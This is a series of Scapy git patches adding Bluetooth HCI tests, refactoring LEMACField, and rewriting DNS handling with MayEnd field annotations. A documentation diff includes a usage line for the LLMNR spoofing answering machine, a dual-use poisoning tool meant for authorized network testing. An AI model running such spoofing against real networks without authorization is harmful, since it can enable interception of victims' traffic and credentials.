HCI_Event_Number_Of_Completed_Packets in pkt.layers() @@ -53,6 +60,46 @@ assert L2CAP_InfoReq in pkt + HCI Commands += Create Connection + +cmd = HCI_Hdr(hex_bytes("0105040d76d56f95010018cc0200000001")) +assert HCI_Cmd_Create_Connection in cmd +assert cmd[HCI_Cmd_Create_Connection].bd_addr == "00:01:95:6f:d5:76" +assert cmd[HCI_Cmd_Create_Connection].packet_type == 52248 +assert cmd[HCI_Cmd_Create_Connection].page_scan_repetition_mode == 2 +assert cmd[HCI_Cmd_Create_Connection].reserved == 0 +assert cmd[HCI_Cmd_Create_Connection].clock_offset == 0 +assert cmd[HCI_Cmd_Create_Connection].allow_role_switch == 1 + += Authentication Requested + +cmd = HCI_Hdr(hex_bytes("011104020001")) +assert HCI_Cmd_Authentication_Requested in cmd +assert cmd[HCI_Cmd_Authentication_Requested].handle == 256 + += Link Key Request Reply + +cmd = HCI_Hdr(hex_bytes("010b041676d56f9501006c9016a48a009180086a39200f03d3dd")) +assert HCI_Cmd_Link_Key_Request_Reply in cmd +assert cmd[HCI_Cmd_Link_Key_Request_Reply].bd_addr == "00:01:95:6f:d5:76" +assert cmd[HCI_Cmd_Link_Key_Request_Reply].link_key == 294855023751241435024024030130491265132 + += Set Connection Encryption + +cmd = HCI_Hdr(hex_bytes("01130403000101")) +assert HCI_Cmd_Set_Connection_Encryption in cmd +assert cmd[HCI_Cmd_Set_Connection_Encryption].handle == 256 +assert cmd[HCI_Cmd_Set_Connection_Encryption].encryption_enable == 1 + += Remote Name Request + +cmd = HCI_Hdr(hex_bytes("0119040a76d56f95010002000000")) +assert HCI_Cmd_Remote_Name_Request in cmd +assert cmd[HCI_Cmd_Remote_Name_Request].bd_addr == "00:01:95:6f:d5:76" +assert cmd[HCI_Cmd_Remote_Name_Request].page_scan_repetition_mode == 2 +assert cmd[HCI_Cmd_Remote_Name_Request].reserved == 0 +assert cmd[HCI_Cmd_Remote_Name_Request].clock_offset == 0 + = LE Create Connection # Request data @@ -120,6 +167,25 @@ assert expected_cmd_raw_data == cmd_raw_data + HCI Events + += Connect Complete + +evt_raw_data = hex_bytes("04030b00000176d56f9501000100") +evt_pkt = HCI_Hdr(evt_raw_data) +assert HCI_Event_Connect_Complete in evt_pkt +assert evt_pkt[HCI_Event_Connect_Complete].status == 0 +assert evt_pkt[HCI_Event_Connect_Complete].handle == 256 +assert evt_pkt[HCI_Event_Connect_Complete].bd_addr == "00:01:95:6f:d5:76" + += Remote Name Request Complete + +evt_raw_data = hex_bytes("0407ff0076d56f950100746573742d6c6170746f70000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000") +evt_pkt = HCI_Hdr(evt_raw_data) +assert HCI_Event_Remote_Name_Request_Complete in evt_pkt +assert evt_pkt[HCI_Event_Remote_Name_Request_Complete].status == 0 +assert evt_pkt[HCI_Event_Remote_Name_Request_Complete].bd_addr == "00:01:95:6f:d5:76" +assert evt_pkt[HCI_Event_Remote_Name_Request_Complete].remote_name == b"test-laptop".ljust(248, b"\x00") + = LE Connection Update Event evt_raw_data = hex_bytes("043e0a03004800140001003c00") evt_pkt = HCI_Hdr(evt_raw_data) From 91159a701cc690769c2db85e38ebe3e89728c935 Mon Sep 17 00:00:00 2001 From: Antonio Vazquez Date: Thu, 22 Jun 2023 11:04:07 +0200 Subject: [PATCH 1042/1632] bluetooth: Reorder HCI command packets binding to follow opcode (#4037) --- scapy/layers/bluetooth.py | 33 ++++++++++++++------------------- 1 file changed, 14 insertions(+), 19 deletions(-) diff --git a/scapy/layers/bluetooth.py b/scapy/layers/bluetooth.py index 46e4458e1e5..a6a10d71d67 100644 --- a/scapy/layers/bluetooth.py +++ b/scapy/layers/bluetooth.py @@ -1289,14 +1289,20 @@ class HCI_LE_Meta_Long_Term_Key_Request(Packet): conf.l2types.register(DLT_BLUETOOTH_HCI_H4, HCI_Hdr) conf.l2types.register(DLT_BLUETOOTH_HCI_H4_WITH_PHDR, HCI_PHDR_Hdr) -bind_layers(HCI_Command_Hdr, HCI_Cmd_Reset, opcode=0x0c03) +bind_layers(HCI_Command_Hdr, HCI_Cmd_Create_Connection, opcode=0x0405) +bind_layers(HCI_Command_Hdr, HCI_Cmd_Disconnect, opcode=0x0406) +bind_layers(HCI_Command_Hdr, HCI_Cmd_Link_Key_Request_Reply, opcode=0x040b) +bind_layers(HCI_Command_Hdr, HCI_Cmd_Authentication_Requested, opcode=0x0411) +bind_layers(HCI_Command_Hdr, HCI_Cmd_Set_Connection_Encryption, opcode=0x0413) +bind_layers(HCI_Command_Hdr, HCI_Cmd_Remote_Name_Request, opcode=0x0419) bind_layers(HCI_Command_Hdr, HCI_Cmd_Set_Event_Mask, opcode=0x0c01) +bind_layers(HCI_Command_Hdr, HCI_Cmd_Reset, opcode=0x0c03) bind_layers(HCI_Command_Hdr, HCI_Cmd_Set_Event_Filter, opcode=0x0c05) +bind_layers(HCI_Command_Hdr, HCI_Cmd_Write_Local_Name, opcode=0x0c13) bind_layers(HCI_Command_Hdr, HCI_Cmd_Connect_Accept_Timeout, opcode=0x0c16) -bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Host_Supported, opcode=0x0c6d) bind_layers(HCI_Command_Hdr, HCI_Cmd_Write_Extended_Inquiry_Response, opcode=0x0c52) # noqa: E501 +bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Host_Supported, opcode=0x0c6d) bind_layers(HCI_Command_Hdr, HCI_Cmd_Read_BD_Addr, opcode=0x1009) -bind_layers(HCI_Command_Hdr, HCI_Cmd_Write_Local_Name, opcode=0x0c13) bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Read_Buffer_Size, opcode=0x2002) bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Set_Random_Address, opcode=0x2005) bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Set_Advertising_Parameters, opcode=0x2006) # noqa: E501 @@ -1305,12 +1311,6 @@ class HCI_LE_Meta_Long_Term_Key_Request(Packet): bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Set_Advertise_Enable, opcode=0x200a) bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Set_Scan_Parameters, opcode=0x200b) bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Set_Scan_Enable, opcode=0x200c) -bind_layers(HCI_Command_Hdr, HCI_Cmd_Create_Connection, opcode=0x0405) -bind_layers(HCI_Command_Hdr, HCI_Cmd_Disconnect, opcode=0x406) -bind_layers(HCI_Command_Hdr, HCI_Cmd_Link_Key_Request_Reply, opcode=0x040b) -bind_layers(HCI_Command_Hdr, HCI_Cmd_Authentication_Requested, opcode=0x0411) -bind_layers(HCI_Command_Hdr, HCI_Cmd_Set_Connection_Encryption, opcode=0x0413) -bind_layers(HCI_Command_Hdr, HCI_Cmd_Remote_Name_Request, opcode=0x0419) bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Create_Connection, opcode=0x200d) bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Create_Connection_Cancel, opcode=0x200e) # noqa: E501 bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Read_White_List_Size, opcode=0x200f) @@ -1319,21 +1319,16 @@ class HCI_LE_Meta_Long_Term_Key_Request(Packet): bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Remove_Device_From_White_List, opcode=0x2012) # noqa: E501 bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Connection_Update, opcode=0x2013) bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Read_Remote_Used_Features, opcode=0x2016) # noqa: E501 - - bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Start_Encryption_Request, opcode=0x2019) # noqa: E501 - -bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Start_Encryption_Request, opcode=0x2019) # noqa: E501 - bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Long_Term_Key_Request_Reply, opcode=0x201a) # noqa: E501 bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Long_Term_Key_Request_Negative_Reply, opcode=0x201b) # noqa: E501 -bind_layers(HCI_Event_Hdr, HCI_Event_Connect_Complete, code=0x3) -bind_layers(HCI_Event_Hdr, HCI_Event_Disconnection_Complete, code=0x5) +bind_layers(HCI_Event_Hdr, HCI_Event_Connect_Complete, code=0x03) +bind_layers(HCI_Event_Hdr, HCI_Event_Disconnection_Complete, code=0x05) bind_layers(HCI_Event_Hdr, HCI_Event_Remote_Name_Request_Complete, code=0x07) -bind_layers(HCI_Event_Hdr, HCI_Event_Encryption_Change, code=0x8) -bind_layers(HCI_Event_Hdr, HCI_Event_Command_Complete, code=0xe) -bind_layers(HCI_Event_Hdr, HCI_Event_Command_Status, code=0xf) +bind_layers(HCI_Event_Hdr, HCI_Event_Encryption_Change, code=0x08) +bind_layers(HCI_Event_Hdr, HCI_Event_Command_Complete, code=0x0e) +bind_layers(HCI_Event_Hdr, HCI_Event_Command_Status, code=0x0f) bind_layers(HCI_Event_Hdr, HCI_Event_Number_Of_Completed_Packets, code=0x13) bind_layers(HCI_Event_Hdr, HCI_Event_LE_Meta, code=0x3e) From b828bdcdf50ba6a2c5396e440dfe1a7e16909c42 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Sat, 24 Jun 2023 01:33:31 +0200 Subject: [PATCH 1043/1632] Fix capitalization (#4040) --- pyproject.toml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/pyproject.toml b/pyproject.toml index 4550f2e9c91..11a805bef76 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -12,7 +12,7 @@ maintainers = [ { name="Pierre LALET" }, { name="Gabriel POTTER" }, { name="Guillaume VALADON" }, - { name="Nils Weiss" }, + { name="Nils WEISS" }, ] license = { text="GPL-2.0-only" } requires-python = ">=3.7, <4" From 2f2bf33a252397eafd010a9bfb0370c04a19a58d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Antonio=20V=C3=A1zquez?= Date: Thu, 22 Jun 2023 13:18:01 +0200 Subject: [PATCH 1044/1632] bluetooth: Remove duplicage XLEShortField implementation --- scapy/layers/bluetooth.py | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/scapy/layers/bluetooth.py b/scapy/layers/bluetooth.py index a6a10d71d67..c87a599ae63 100644 --- a/scapy/layers/bluetooth.py +++ b/scapy/layers/bluetooth.py @@ -43,13 +43,14 @@ XByteField, XLELongField, XStrLenField, + XLEShortField, ) from scapy.supersocket import SuperSocket from scapy.sendrecv import sndrcv from scapy.data import MTU from scapy.consts import WINDOWS from scapy.error import warning -from scapy.utils import lhex, mac2str, str2mac +from scapy.utils import mac2str, str2mac from scapy.volatile import RandMAC @@ -57,10 +58,6 @@ # Fields # ########## -class XLEShortField(LEShortField): - def i2repr(self, pkt, x): - return lhex(self.i2h(pkt, x)) - class LEMACField(Field): def __init__(self, name, default): From c1c6a586241d356a6e50becf8c80e96e2133f5f5 Mon Sep 17 00:00:00 2001 From: Antonio Vazquez Date: Mon, 26 Jun 2023 09:47:30 +0200 Subject: [PATCH 1045/1632] Move LEMACField to fields, refactor it and add tests (#4043) --- scapy/fields.py | 10 ++++++++++ scapy/layers/bluetooth.py | 36 +----------------------------------- test/fields.uts | 13 +++++++++++++ 3 files changed, 24 insertions(+), 35 deletions(-) diff --git a/scapy/fields.py b/scapy/fields.py index 82a8abd7b07..751b6e764e6 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -793,6 +793,16 @@ def randval(self): return RandMAC() +class LEMACField(MACField): + def i2m(self, pkt, x): + # type: (Optional[Packet], Optional[str]) -> bytes + return MACField.i2m(self, pkt, x)[::-1] + + def m2i(self, pkt, x): + # type: (Optional[Packet], bytes) -> str + return MACField.m2i(self, pkt, x[::-1]) + + class IPField(Field[Union[str, Net], bytes]): def __init__(self, name, default): # type: (str, Optional[str]) -> None diff --git a/scapy/layers/bluetooth.py b/scapy/layers/bluetooth.py index c87a599ae63..74aa01c1434 100644 --- a/scapy/layers/bluetooth.py +++ b/scapy/layers/bluetooth.py @@ -23,7 +23,6 @@ BitField, ByteEnumField, ByteField, - Field, FieldLenField, FieldListField, FlagsField, @@ -44,46 +43,13 @@ XLELongField, XStrLenField, XLEShortField, + LEMACField, ) from scapy.supersocket import SuperSocket from scapy.sendrecv import sndrcv from scapy.data import MTU from scapy.consts import WINDOWS from scapy.error import warning -from scapy.utils import mac2str, str2mac -from scapy.volatile import RandMAC - - -########## -# Fields # -########## - - -class LEMACField(Field): - def __init__(self, name, default): - Field.__init__(self, name, default, "6s") - - def i2m(self, pkt, x): - if x is None: - return b"\0\0\0\0\0\0" - return mac2str(x)[::-1] - - def m2i(self, pkt, x): - return str2mac(x[::-1]) - - def any2i(self, pkt, x): - if isinstance(x, (bytes, str)) and len(x) == 6: - x = self.m2i(pkt, x) - return x - - def i2repr(self, pkt, x): - x = self.i2h(pkt, x) - if self in conf.resolve: - x = conf.manufdb._resolve_MAC(x) - return x - - def randval(self): - return RandMAC() ########## diff --git a/test/fields.uts b/test/fields.uts index fe0329f93d3..8081107b21e 100644 --- a/test/fields.uts +++ b/test/fields.uts @@ -95,6 +95,19 @@ r = m.addfield(None, b"FOO", "c0:01:be:ef:ba:be") r assert r == b"FOO\xc0\x01\xbe\xef\xba\xbe" += LEMACField class +~ core field +m = LEMACField("foo", None) +r = m.i2m(None, None) +r +assert r == b"\x00\x00\x00\x00\x00\x00" +r = m.getfield(None, b"\xbe\xba\xef\xbe\x01\xc0ABCD") +r +assert r == (b"ABCD","c0:01:be:ef:ba:be") +r = m.addfield(None, b"FOO", "be:ba:ef:be:01:c0") +r +assert r == b"FOO\xc0\x01\xbe\xef\xba\xbe" + = SourceMACField conf.route.add(net="1.2.3.4/32", dev=conf.iface) p = Ether() / ARP(pdst="1.2.3.4") From dda902e829a51cc6237e253290c6871f30d7daf3 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 26 Jun 2023 22:59:53 +0200 Subject: [PATCH 1046/1632] DNS rewrite + MayEnd (make undersized dissection fail) (#4012) * DNS rewrite * Build/dissect packets on answering tests * Safety check to avoid OOM * DNS backward compatibility * Add MayEnd support * Fix automative tests for MayEnd --- doc/scapy/usage.rst | 10 +- scapy/config.py | 3 + scapy/contrib/altbeacon.py | 11 +- scapy/contrib/automotive/doip.py | 24 +- scapy/contrib/automotive/gm/gmlan.py | 26 +- scapy/contrib/automotive/kwp.py | 25 +- scapy/contrib/coap.py | 6 +- scapy/contrib/erspan.py | 16 +- scapy/contrib/isotp/isotp_utils.py | 9 +- scapy/contrib/ldp.py | 17 +- scapy/contrib/loraphy2wan.py | 35 +- scapy/contrib/openflow3.py | 2 +- scapy/contrib/rtcp.py | 7 +- .../iec104/iec104_information_elements.py | 19 +- scapy/contrib/socks.py | 14 +- scapy/contrib/stamp.py | 6 +- scapy/fields.py | 63 +- scapy/layers/dns.py | 608 ++++++++++-------- scapy/layers/dot11.py | 6 +- scapy/layers/inet6.py | 63 +- scapy/layers/llmnr.py | 41 +- scapy/layers/ntp.py | 41 +- scapy/layers/tls/extensions.py | 87 +-- scapy/layers/tls/keyexchange_tls13.py | 26 +- scapy/packet.py | 8 +- test/answering_machines.uts | 12 +- test/contrib/automotive/doip.uts | 4 +- test/contrib/automotive/ecu.uts | 11 +- test/contrib/automotive/obd/obd.uts | 8 +- test/contrib/automotive/uds.uts | 4 +- test/contrib/bgp.uts | 2 +- test/contrib/eigrp.uts | 22 +- test/contrib/erspan.uts | 4 +- test/contrib/ethercat.uts | 5 + test/contrib/ldp.uts | 1 + test/contrib/modbus.uts | 2 +- test/contrib/pcom.uts | 8 +- test/contrib/pim.uts | 2 +- test/scapy/layers/dhcp6.uts | 6 +- test/scapy/layers/dns.uts | 161 +++-- test/scapy/layers/dot11.uts | 4 +- test/scapy/layers/inet.uts | 7 + test/scapy/layers/inet6.uts | 33 +- test/scapy/layers/ntp.uts | 18 +- test/tls.uts | 2 +- test/tls13.uts | 7 + 46 files changed, 913 insertions(+), 583 deletions(-) diff --git a/doc/scapy/usage.rst b/doc/scapy/usage.rst index 0bdb84e02de..1e6c1e37842 100644 --- a/doc/scapy/usage.rst +++ b/doc/scapy/usage.rst @@ -1361,21 +1361,21 @@ DNS Requests This will perform a DNS request looking for IPv4 addresses >>> ans = sr1(IP(dst="8.8.8.8")/UDP(sport=RandShort(), dport=53)/DNS(rd=1,qd=DNSQR(qname="secdev.org",qtype="A"))) - >>> ans.an.rdata + >>> ans.an[0].rdata '217.25.178.5' **SOA request:** >>> ans = sr1(IP(dst="8.8.8.8")/UDP(sport=RandShort(), dport=53)/DNS(rd=1,qd=DNSQR(qname="secdev.org",qtype="SOA"))) - >>> ans.ns.mname + >>> ans.an[0].mname b'dns.ovh.net.' - >>> ans.ns.rname + >>> ans.an[0].rname b'tech.ovh.net.' **MX request:** >>> ans = sr1(IP(dst="8.8.8.8")/UDP(sport=RandShort(), dport=53)/DNS(rd=1,qd=DNSQR(qname="google.com",qtype="MX"))) - >>> results = [x.exchange for x in ans.an.iterpayloads()] + >>> results = [x.exchange for x in ans.an] >>> results [b'alt1.aspmx.l.google.com.', b'alt4.aspmx.l.google.com.', @@ -1477,7 +1477,7 @@ LLMNR spoof See :class:`~scapy.layers.llmnr.LLMNR_am`:: >>> conf.iface = "tap0" - >>> llmnr_spoof(iface="tap0", filter_ips=Net("10.0.0.1/24")) + >>> llmnr_spoof(iface="tap0", from_ip=Net("10.0.0.1/24")) Netbios spoof ------------- diff --git a/scapy/config.py b/scapy/config.py index 2651616fa57..a3a79e87ed4 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -911,6 +911,9 @@ class Conf(ConfClass): loopback_name = "lo" if LINUX else "lo0" nmap_base = "" # type: str nmap_kdb = None # type: Optional[NmapKnowledgeBase] + #: a safety mechanism: the maximum amount of items included in a PacketListField + #: or a FieldListField + max_list_count = 100 def __getattribute__(self, attr): # type: (str) -> Any diff --git a/scapy/contrib/altbeacon.py b/scapy/contrib/altbeacon.py index eacbd8532e9..b263872b0bb 100644 --- a/scapy/contrib/altbeacon.py +++ b/scapy/contrib/altbeacon.py @@ -11,8 +11,13 @@ The AltBeacon specification can be found at: https://github.com/AltBeacon/spec """ -from scapy.fields import ByteField, ShortField, SignedByteField, \ - StrFixedLenField +from scapy.fields import ( + ByteField, + MayEnd, + ShortField, + SignedByteField, + StrFixedLenField, +) from scapy.layers.bluetooth import EIR_Hdr, EIR_Manufacturer_Specific_Data, \ UUIDField, LowEnergyBeaconHelper from scapy.packet import Packet @@ -54,7 +59,7 @@ class AltBeacon(Packet, LowEnergyBeaconHelper): ShortField("id2", None), ShortField("id3", None), - SignedByteField("tx_power", None), + MayEnd(SignedByteField("tx_power", None)), ByteField("mfg_reserved", None), ] diff --git a/scapy/contrib/automotive/doip.py b/scapy/contrib/automotive/doip.py index 139a603065c..98dde3944ed 100644 --- a/scapy/contrib/automotive/doip.py +++ b/scapy/contrib/automotive/doip.py @@ -13,9 +13,19 @@ import time from scapy.contrib.automotive import log_automotive -from scapy.fields import ByteEnumField, ConditionalField, \ - XByteField, XShortField, XIntField, XShortEnumField, XByteEnumField, \ - IntField, StrFixedLenField, XStrField +from scapy.fields import ( + ByteEnumField, + ConditionalField, + IntField, + MayEnd, + StrFixedLenField, + XByteEnumField, + XByteField, + XIntField, + XShortEnumField, + XShortField, + XStrField, +) from scapy.packet import Packet, bind_layers, bind_bottom_up from scapy.supersocket import StreamSocket from scapy.layers.inet import TCP, UDP @@ -28,6 +38,8 @@ Optional, ) +# ISO 13400-2 sect 9.2 + class DoIP(Packet): """ @@ -121,7 +133,7 @@ class DoIP(Packet): lambda p: p.payload_type in [2, 4]), ConditionalField(StrFixedLenField("gid", b"", 6), lambda p: p.payload_type in [4]), - ConditionalField(XByteEnumField("further_action", 0, { + ConditionalField(MayEnd(XByteEnumField("further_action", 0, { 0x00: "No further action required", 0x01: "Reserved by ISO 13400", 0x02: "Reserved by ISO 13400", 0x03: "Reserved by ISO 13400", 0x04: "Reserved by ISO 13400", @@ -132,7 +144,9 @@ class DoIP(Packet): 0x0d: "Reserved by ISO 13400", 0x0e: "Reserved by ISO 13400", 0x0f: "Reserved by ISO 13400", 0x10: "Routing activation required to initiate central security", - }), lambda p: p.payload_type in [4]), + })), lambda p: p.payload_type in [4]), + # VIN/GID sync. status is marked as optional, so the packet MayEnd + # on further_action ConditionalField(XByteEnumField("vin_gid_status", 0, { 0x00: "VIN and/or GID are synchronized", 0x01: "Reserved by ISO 13400", 0x02: "Reserved by ISO 13400", diff --git a/scapy/contrib/automotive/gm/gmlan.py b/scapy/contrib/automotive/gm/gmlan.py index f4a248dce92..ce88513c99d 100644 --- a/scapy/contrib/automotive/gm/gmlan.py +++ b/scapy/contrib/automotive/gm/gmlan.py @@ -10,10 +10,25 @@ import struct from scapy.contrib.automotive import log_automotive -from scapy.fields import ObservableDict, XByteEnumField, ByteEnumField, \ - ConditionalField, XByteField, StrField, XShortEnumField, XShortField, \ - X3BytesField, XIntField, ShortField, PacketField, PacketListField, \ - FieldListField, MultipleTypeField, StrFixedLenField +from scapy.fields import ( + ByteEnumField, + ConditionalField, + FieldListField, + MayEnd, + MultipleTypeField, + ObservableDict, + PacketField, + PacketListField, + ShortField, + StrField, + StrFixedLenField, + X3BytesField, + XByteEnumField, + XByteField, + XIntField, + XShortEnumField, + XShortField, +) from scapy.packet import Packet, bind_layers, NoPayload from scapy.config import conf from scapy.contrib.isotp import ISOTP @@ -725,7 +740,8 @@ class GMLAN_NR(Packet): name = 'NegativeResponse' fields_desc = [ XByteEnumField('requestServiceId', 0, GMLAN.services), - ByteEnumField('returnCode', 0, negativeResponseCodes), + MayEnd(ByteEnumField('returnCode', 0, negativeResponseCodes)), + # XXX Is this MayEnd correct? Why is the field below also 0xe3 ? ShortField('deviceControlLimitExceeded', 0) ] diff --git a/scapy/contrib/automotive/kwp.py b/scapy/contrib/automotive/kwp.py index 8914f205b78..5617c1d7a23 100644 --- a/scapy/contrib/automotive/kwp.py +++ b/scapy/contrib/automotive/kwp.py @@ -8,9 +8,19 @@ import struct -from scapy.fields import ByteEnumField, StrField, ConditionalField, \ - BitField, XByteField, X3BytesField, ByteField, \ - ObservableDict, XShortEnumField, XByteEnumField +from scapy.fields import ( + BitField, + ByteEnumField, + ByteField, + ConditionalField, + MayEnd, + ObservableDict, + StrField, + X3BytesField, + XByteEnumField, + XByteField, + XShortEnumField, +) from scapy.packet import Packet, bind_layers, NoPayload from scapy.config import conf from scapy.error import log_loading @@ -391,7 +401,8 @@ class KWP_ROE(Packet): fields_desc = [ ByteEnumField('responseRequired', 1, responseTypes), ByteEnumField('eventWindowTime', 0, eventWindowTimes), - ByteEnumField('eventType', 0, eventTypes), + MayEnd(ByteEnumField('eventType', 0, eventTypes)), + # XXX Is this MayEnd correct? ByteField('eventParameter', 0), ByteEnumField('serviceToRespond', 0, KWP.services), ByteField('serviceParameter', 0) @@ -405,7 +416,8 @@ class KWP_ROEPR(Packet): name = 'ResponseOnEventPositiveResponse' fields_desc = [ ByteField("numberOfActivatedEvents", 0), - ByteEnumField('eventWindowTime', 0, KWP_ROE.eventWindowTimes), + MayEnd(ByteEnumField('eventWindowTime', 0, KWP_ROE.eventWindowTimes)), + # XXX Is this MayEnd correct? ByteEnumField('eventType', 0, KWP_ROE.eventTypes), ] @@ -958,7 +970,8 @@ class KWP_NR(Packet): } name = 'NegativeResponse' fields_desc = [ - XByteEnumField('requestServiceId', 0, KWP.services), + MayEnd(XByteEnumField('requestServiceId', 0, KWP.services)), + # XXX Is this MayEnd correct? ByteEnumField('negativeResponseCode', 0, negativeResponseCodes) ] diff --git a/scapy/contrib/coap.py b/scapy/contrib/coap.py index 340b6a4d428..1c8eb3d7b14 100644 --- a/scapy/contrib/coap.py +++ b/scapy/contrib/coap.py @@ -120,9 +120,9 @@ def _get_opt_val_size(pkt): class _CoAPOpt(Packet): fields_desc = [BitField("delta", 0, 4), BitField("len", 0, 4), - StrLenField("delta_ext", None, length_from=_get_delta_ext_size), # noqa: E501 - StrLenField("len_ext", None, length_from=_get_len_ext_size), - StrLenField("opt_val", None, length_from=_get_opt_val_size)] + StrLenField("delta_ext", "", length_from=_get_delta_ext_size), # noqa: E501 + StrLenField("len_ext", "", length_from=_get_len_ext_size), + StrLenField("opt_val", "", length_from=_get_opt_val_size)] @staticmethod def _populate_extended(val): diff --git a/scapy/contrib/erspan.py b/scapy/contrib/erspan.py index 69c3310cc32..3ef2d6157fc 100644 --- a/scapy/contrib/erspan.py +++ b/scapy/contrib/erspan.py @@ -4,6 +4,8 @@ """ ERSPAN - Encapsulated Remote SPAN + +https://datatracker.ietf.org/doc/html/draft-foschiano-erspan-03 """ # scapy.contrib.description = ERSPAN - Encapsulated Remote SPAN @@ -19,16 +21,24 @@ class ERSPAN(Packet): """ - A generic ERSPAN packet, pointing by default to ERSPAN II + A generic ERSPAN packet """ name = "ERSPAN" fields_desc = [] @classmethod def dispatch_hook(cls, _pkt=None, *args, **kargs): + if _pkt: + ver = _pkt[0] >> 4 + if ver == 1: + return ERSPAN_II + elif ver == 2: + return ERSPAN_III + else: + return ERSPAN_I if cls == ERSPAN: return ERSPAN_II - return Packet.dispatch_hook(cls, _pkt, *args, **kargs) + return cls class ERSPAN_I(ERSPAN): @@ -40,7 +50,7 @@ class ERSPAN_I(ERSPAN): class ERSPAN_II(ERSPAN): name = "ERSPAN II" match_subclass = True - fields_desc = [BitField("ver", 0, 4), + fields_desc = [BitField("ver", 1, 4), BitField("vlan", 0, 12), BitField("cos", 0, 3), BitField("en", 0, 2), diff --git a/scapy/contrib/isotp/isotp_utils.py b/scapy/contrib/isotp/isotp_utils.py index 9f15193aa8c..49269f20aab 100644 --- a/scapy/contrib/isotp/isotp_utils.py +++ b/scapy/contrib/isotp/isotp_utils.py @@ -10,6 +10,7 @@ import struct +from scapy.config import conf from scapy.utils import EDecimal from scapy.packet import Packet from scapy.sessions import DefaultSession @@ -201,7 +202,13 @@ def _build( # type: (...) -> ISOTP bucket = t[2] data = bucket.ready or b"" - p = basecls(data) + try: + p = basecls(data) + except Exception: + if conf.debug_dissector: + from scapy.sendrecv import debug + debug.crashed_on = (basecls, data) + raise if hasattr(p, "rx_id"): p.rx_id = t[0] if hasattr(p, "rx_ext_address"): diff --git a/scapy/contrib/ldp.py b/scapy/contrib/ldp.py index ae36c58d062..bd08ee8f58f 100644 --- a/scapy/contrib/ldp.py +++ b/scapy/contrib/ldp.py @@ -17,8 +17,15 @@ from scapy.compat import orb from scapy.packet import Packet, bind_layers, bind_bottom_up -from scapy.fields import BitField, IPField, IntField, ShortField, StrField, \ - XBitField +from scapy.fields import ( + BitField, + MayEnd, + IPField, + IntField, + ShortField, + StrField, + XBitField, +) from scapy.layers.inet import UDP from scapy.layers.inet import TCP from scapy.config import conf @@ -168,6 +175,8 @@ def size(self, s): return tmp_len def getfield(self, pkt, s): + if not s: + return s, [] tmp_len = self.size(s) return s[tmp_len:], self.m2i(pkt, s[:tmp_len]) @@ -358,7 +367,7 @@ class LDPLabelMM(_LDP_Packet): XBitField("type", 0x0400, 15), ShortField("len", None), IntField("id", 0), - FecTLVField("fec", None), + MayEnd(FecTLVField("fec", None)), LabelTLVField("label", 0)] # 3.5.8. Label Request Message @@ -393,7 +402,7 @@ class LDPLabelWM(_LDP_Packet): XBitField("type", 0x0402, 15), ShortField("len", None), IntField("id", 0), - FecTLVField("fec", None), + MayEnd(FecTLVField("fec", None)), LabelTLVField("label", 0)] # 3.5.11. Label Release Message diff --git a/scapy/contrib/loraphy2wan.py b/scapy/contrib/loraphy2wan.py index 08b570f0572..01487d457dd 100644 --- a/scapy/contrib/loraphy2wan.py +++ b/scapy/contrib/loraphy2wan.py @@ -16,12 +16,29 @@ """ from scapy.packet import Packet -from scapy.fields import BitField, ByteEnumField, ByteField, \ - ConditionalField, IntField, LEShortField, PacketListField, \ - StrFixedLenField, X3BytesField, XByteField, XIntField, \ - XShortField, BitFieldLenField, LEX3BytesField, XBitField, \ - BitEnumField, XLEIntField, StrField, PacketField, \ - MultipleTypeField +from scapy.fields import ( + BitEnumField, + BitField, + BitFieldLenField, + ByteEnumField, + ByteField, + ConditionalField, + IntField, + LEShortField, + LEX3BytesField, + MayEnd, + MultipleTypeField, + PacketField, + PacketListField, + StrField, + StrFixedLenField, + X3BytesField, + XBitField, + XByteField, + XIntField, + XLEIntField, + XShortField, +) class FCtrl_DownLink(Packet): @@ -692,9 +709,9 @@ class PHYPayload(Packet): name = "PHYPayload" fields_desc = [MHDR, MACPayload, - ConditionalField(XIntField("MIC", 0), - lambda pkt:(pkt.MType != 0b001 or - LoRa.encrypted is False))] + MayEnd(ConditionalField(XIntField("MIC", 0), + lambda pkt: (pkt.MType != 0b001 or + LoRa.encrypted is False)))] class LoRa(Packet): # default frame (unclear specs => taken from https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5677147/) # noqa: E501 diff --git a/scapy/contrib/openflow3.py b/scapy/contrib/openflow3.py index 5fe0cf6e715..1f7bc15ce2f 100755 --- a/scapy/contrib/openflow3.py +++ b/scapy/contrib/openflow3.py @@ -2248,7 +2248,7 @@ class OFPFlowStats(_ofp_header_item): LongField("byte_count", 0), MatchField("match"), PacketListField("instructions", [], OFPIT, - length_from=lambda pkt:pkt.len - 56 - pkt.match.len)] # noqa: E501 + length_from=lambda pkt:pkt.len - 52 - pkt.match.len)] # noqa: 